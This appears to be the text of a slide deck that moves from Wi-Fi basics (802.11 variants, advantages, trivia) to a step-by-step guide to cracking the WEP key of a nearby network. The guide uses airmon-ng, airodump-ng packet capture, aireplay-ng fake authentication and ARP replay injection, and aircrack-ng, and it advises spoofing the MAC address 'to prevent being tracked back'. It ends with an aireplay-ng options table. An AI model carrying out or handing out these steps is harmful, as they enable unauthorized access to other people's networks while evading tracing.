Chances are you have a Wi-Fi network at home, or live close to one (or more) that tantalizingly pops up in a list whenever you boot up the laptop.
The problem is, if there's a lock next to the network name (AKA the SSID, or service set identifier), that indicates security is activated. Without the password or passphrase, you're not going to get access to that network, or the sweet, sweet internet that goes with it.
2. WHAT is Wi-Fi?
Stands for Wireless Fidelity
Uses 2.4 – 5 GHz Band in the frequency spectrum
Allows data to be exchanged WIRELESSLY
Uses Radio Waves
Defined as “WLAN products that are based on the IEEE
802.11 standards”
In 2004, Mysore became India's first Wi-fi-enabled city
and second in the world after Jerusalem.
3. Advantages
Cheaper
Less complexity (mainly caused due to wires)
Fast Connectivity
Secure with new WPA2 method
4. Disadvantages
Require a Wi-Fi adapter (Obviously)
Slower data transfer when the range is low
Obstructions may cause disconnections
WEP pass code is easily CRACKABLE. !
5. Wi-Fi is called as “802.11 Standard”
Flavors of 802.11 :
802.11a operates on the 5GHz spectrum providing a speed of
20 Mbps
802.11b operates on the 2.4GHz spectrum providing a speed of
11.4 Mbps
802.11g operates on the 2.4GHz spectrum providing blazingly
fast speeds
802.11n is a new technology
6. Do YoU KnOw !?
Prerequisites:
1. Compatible wireless adapter
2. Backtrack 3 over advanced (USB boot or Llive CD)
3. WEP Enabled WiFi network
4. Knowledge on Channel, BSSID, ESSID, Mac ID
7. LeTs GeT cRaCkInG!
1. To crack the WEP key, first boot into Backtrack and
use the Text Mode or Default Mode, Load the GUI
using “startx”
2. One imp. thing is to know adapter your laptop has
whether or not it has the capability to inject
payloads or not. So we use airmon-ng to list all
the interfaces
8. KeEp It CoMiNg …
3. Now first we stop the interface we want to use
using airmon-ng stop (intf).
4. To CONFIRM, the interface is down, use ifconfig
(intf) down.
5. Now prevent being tracked back, we fake our Mac
ID using macchanger --mac (hex)(intf)
9. FaStEr NoW … C’mOn
6. Now we finally start the interface using airmon-
ng start (intf)
7. Now its time to find the network and exploit it so
use airodump-ng (intf) to find the BSSID of the
network - Basic Service Set Identifier and Channel
8. Now with the following cmd, we try to capture the
traffic on the network and using that traffic to crack
the WEP key airodump-ng (intf) -c (ch) -w
(intf) --bssid (bssid)
10. YoUr NeArLy DoNe !
9. [In a NEW CONSOLE] Here we try to virtually
increase the traffic by sending garbage data over
the network and forcing the router to reply and
with the help of that, we try to break the WEP key
aireplay-ng -1 0 -a (bssid) -h (mac) -e (essid)
(intf) and then aireplay-ng -3 -b (bssid) -h
(mac) (intf)
10. Now wait patiently till the #Data goes above 10K (
Recommended)
11. SuCcEsSfUl??!
11. Use ls to list the files on the desktop which are
actually the files where the traffic is being logged
12. Now finally use aircrack to use the IV’s to crack the
WEP using aircrack-ng -b (bssid) Wifi-01.cap
Now to understand the commands here is the extra
information -> Next Slide :D
12. Filter options: Attack Modes:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-deauthenticate 1 or all stations
(-0)
-fake authentication with AP (-
1)
-interactive frame selection (-2)
-standard ARP-request replay
(-3)
-decrypt/chopchop WEP
packet (-4)
-generates valid keystream (-5)
-injection test (-9)
aireplay-ng <options> <replay interface>